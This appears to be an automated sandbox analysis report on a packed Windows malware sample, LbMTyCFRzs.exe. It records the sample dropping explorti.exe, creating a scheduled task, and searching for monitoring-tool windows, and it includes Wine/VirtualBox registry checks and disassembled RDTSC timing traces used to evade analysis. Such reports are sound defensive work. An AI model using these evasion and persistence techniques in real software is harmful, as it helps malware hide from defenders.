Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: LbMTyCFRzs.exe

Static file information: File size 1894912 > 1048576

Source: LbMTyCFRzs.exe

Static PE information: Raw size of asfmuayv is bigger than: 0x100000 < 0x19d200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Unpacked PE file: 0.2.LbMTyCFRzs.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;asfmuayv:EW;wcsgqvbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;asfmuayv:EW;wcsgqvbi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;asfmuayv:EW;wcsgqvbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;asfmuayv:EW;wcsgqvbi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 6.2.explorti.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;asfmuayv:EW;wcsgqvbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;asfmuayv:EW;wcsgqvbi:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1de1cd should be: 0x1d0036
Source: LbMTyCFRzs.exe	Static PE information: real checksum: 0x1de1cd should be: 0x1d0036

Source: LbMTyCFRzs.exe	Static PE information: section name:
Source: LbMTyCFRzs.exe	Static PE information: section name: .idata
Source: LbMTyCFRzs.exe	Static PE information: section name:
Source: LbMTyCFRzs.exe	Static PE information: section name: asfmuayv
Source: LbMTyCFRzs.exe	Static PE information: section name: wcsgqvbi
Source: LbMTyCFRzs.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: asfmuayv
Source: explorti.exe.0.dr	Static PE information: section name: wcsgqvbi
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 6_2_0062D84C push ecx; ret

6_2_0062D85F

Source: LbMTyCFRzs.exe	Static PE information: section name: entropy: 7.9863818416966215
Source: LbMTyCFRzs.exe	Static PE information: section name: asfmuayv entropy: 7.953126827384316
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.9863818416966215
Source: explorti.exe.0.dr	Static PE information: section name: asfmuayv entropy: 7.953126827384316

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: A7F16A second address: A7F16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: A7F16E second address: A7F174 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: A7F174 second address: A7E9B8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF4D529DDECh 0x00000008 ja 00007FF4D529DDE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+122D314Bh], edx 0x00000019 push dword ptr [ebp+122D008Dh] 0x0000001f jl 00007FF4D529DDEEh 0x00000025 mov dword ptr [ebp+122D178Bh], ecx 0x0000002b call dword ptr [ebp+122D353Fh] 0x00000031 pushad 0x00000032 mov dword ptr [ebp+122D2A6Ah], eax 0x00000038 xor eax, eax 0x0000003a pushad 0x0000003b push ecx 0x0000003c adc si, 0E53h 0x00000041 pop edi 0x00000042 mov edx, 2FA603E8h 0x00000047 popad 0x00000048 mov edx, dword ptr [esp+28h] 0x0000004c jl 00007FF4D529DDECh 0x00000052 mov dword ptr [ebp+122D2A6Ah], ebx 0x00000058 mov dword ptr [ebp+122D37F4h], eax 0x0000005e clc 0x0000005f mov esi, 0000003Ch 0x00000064 clc 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jbe 00007FF4D529DDECh 0x0000006f mov dword ptr [ebp+122D3221h], esi 0x00000075 jc 00007FF4D529DDE7h 0x0000007b stc 0x0000007c lodsw 0x0000007e xor dword ptr [ebp+122D3221h], esi 0x00000084 add eax, dword ptr [esp+24h] 0x00000088 jmp 00007FF4D529DDF1h 0x0000008d mov ebx, dword ptr [esp+24h] 0x00000091 stc 0x00000092 nop 0x00000093 push esi 0x00000094 pushad 0x00000095 jmp 00007FF4D529DDF1h 0x0000009a push eax 0x0000009b push edx 0x0000009c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BEFE36 second address: BEFE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 ja 00007FF4D46D40B6h 0x0000000e pop ebx 0x0000000f jmp 00007FF4D46D40C2h 0x00000014 popad 0x00000015 pushad 0x00000016 jl 00007FF4D46D40BEh 0x0000001c ja 00007FF4D46D40B6h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FF4D46D40C2h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BEFE7B second address: BEFE7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF0121 second address: BF013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF4D46D40C1h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF03EC second address: BF03F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF03F0 second address: BF03FD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF4D46D40B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF03FD second address: BF041D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pushad 0x00000008 jmp 00007FF4D529DDF0h 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2B1C second address: BF2B44 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF4D46D40B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jo 00007FF4D46D40B6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push edi 0x00000017 je 00007FF4D46D40B6h 0x0000001d pop edi 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2B44 second address: BF2B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2B48 second address: BF2B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2B4C second address: BF2B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ebx 0x00000014 pushad 0x00000015 jmp 00007FF4D529DDF0h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2B73 second address: A7E9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 jng 00007FF4D46D40B6h 0x0000000d push dword ptr [ebp+122D008Dh] 0x00000013 cld 0x00000014 call dword ptr [ebp+122D353Fh] 0x0000001a pushad 0x0000001b mov dword ptr [ebp+122D2A6Ah], eax 0x00000021 xor eax, eax 0x00000023 pushad 0x00000024 push ecx 0x00000025 adc si, 0E53h 0x0000002a pop edi 0x0000002b mov edx, 2FA603E8h 0x00000030 popad 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jl 00007FF4D46D40BCh 0x0000003b mov dword ptr [ebp+122D37F4h], eax 0x00000041 clc 0x00000042 mov esi, 0000003Ch 0x00000047 clc 0x00000048 add esi, dword ptr [esp+24h] 0x0000004c jbe 00007FF4D46D40BCh 0x00000052 mov dword ptr [ebp+122D3221h], esi 0x00000058 jc 00007FF4D46D40B7h 0x0000005e stc 0x0000005f lodsw 0x00000061 xor dword ptr [ebp+122D3221h], esi 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b jmp 00007FF4D46D40C1h 0x00000070 mov ebx, dword ptr [esp+24h] 0x00000074 stc 0x00000075 nop 0x00000076 push esi 0x00000077 pushad 0x00000078 jmp 00007FF4D46D40C1h 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2BAD second address: BF2BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2BBB second address: BF2BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2BBF second address: BF2BC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2BC5 second address: BF2BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF4D46D40B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2BCF second address: BF2C0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call 00007FF4D529DDF4h 0x0000000e mov ecx, 65BE5709h 0x00000013 pop edx 0x00000014 push 00000000h 0x00000016 mov si, 466Ah 0x0000001a push 8360E6EFh 0x0000001f pushad 0x00000020 push ecx 0x00000021 jnp 00007FF4D529DDE6h 0x00000027 pop ecx 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2C0B second address: BF2C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 7C9F1991h 0x0000000d push 00000003h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF4D46D40B8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007FF4D46D40B8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov dx, C1A5h 0x00000049 push 00000003h 0x0000004b cld 0x0000004c call 00007FF4D46D40B9h 0x00000051 jmp 00007FF4D46D40C0h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a push eax 0x0000005b pop eax 0x0000005c jnl 00007FF4D46D40B6h 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2C8C second address: BF2C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF4D529DDE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2C96 second address: BF2CB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2CB1 second address: BF2CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF4D529DDF0h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 jmp 00007FF4D529DDF5h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF4D529DDEFh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2CF2 second address: BF2D1F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF4D46D40B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FF4D46D40C8h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2D1F second address: BF2D6A instructions: 0x00000000 rdtsc 0x00000002 js 00007FF4D529DDECh 0x00000008 jg 00007FF4D529DDE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FF4D529DDE8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov dl, ch 0x0000002d mov dx, di 0x00000030 lea ebx, dword ptr [ebp+12447A4Ch] 0x00000036 stc 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 push edi 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c pop edi 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2D6A second address: BF2D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2DE8 second address: BF2DF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2DF6 second address: BF2E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FF4D46D40B8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2E09 second address: BF2E70 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF4D529DDECh 0x00000008 jc 00007FF4D529DDE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov edx, 0681F312h 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 mov dx, 52F1h 0x0000001d popad 0x0000001e jc 00007FF4D529DDECh 0x00000024 mov dword ptr [ebp+122D329Ah], esi 0x0000002a call 00007FF4D529DDE9h 0x0000002f pushad 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 jc 00007FF4D529DDE6h 0x00000039 popad 0x0000003a jmp 00007FF4D529DDEEh 0x0000003f popad 0x00000040 push eax 0x00000041 jmp 00007FF4D529DDF0h 0x00000046 mov eax, dword ptr [esp+04h] 0x0000004a push esi 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2E70 second address: BF2E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2E74 second address: BF2E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2E81 second address: BF2F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ebx 0x0000000b jnp 00007FF4D46D40CFh 0x00000011 pop ebx 0x00000012 pop eax 0x00000013 mov dword ptr [ebp+122D329Ah], ebx 0x00000019 push 00000003h 0x0000001b jbe 00007FF4D46D40B8h 0x00000021 mov esi, edi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007FF4D46D40B8h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 0000001Ah 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f push 00000003h 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007FF4D46D40B8h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 00000015h 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b jnc 00007FF4D46D40C6h 0x00000061 call 00007FF4D46D40B9h 0x00000066 pushad 0x00000067 push ecx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2F23 second address: BF2F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF4D529DDEFh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FF4D529DDECh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF2F49 second address: BF2F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d jmp 00007FF4D46D40BEh 0x00000012 pop ecx 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007FF4D46D40BCh 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007FF4D46D40C3h 0x00000026 jmp 00007FF4D46D40BDh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF307B second address: BF30E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 add dword ptr [esp], 556FF1D9h 0x0000000d cld 0x0000000e push 00000003h 0x00000010 clc 0x00000011 push 00000000h 0x00000013 and esi, dword ptr [ebp+122D30C6h] 0x00000019 pushad 0x0000001a mov esi, dword ptr [ebp+122D35A0h] 0x00000020 mov dword ptr [ebp+122D17A6h], ebx 0x00000026 popad 0x00000027 push 00000003h 0x00000029 call 00007FF4D529DDE9h 0x0000002e jno 00007FF4D529DDEAh 0x00000034 push eax 0x00000035 jmp 00007FF4D529DDF0h 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e push ecx 0x0000003f pushad 0x00000040 jmp 00007FF4D529DDF2h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF30E2 second address: BF30FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FF4D46D40BAh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF30FE second address: BF3102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BF3102 second address: BF310C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF4D46D40B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C14C5E second address: C14C63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
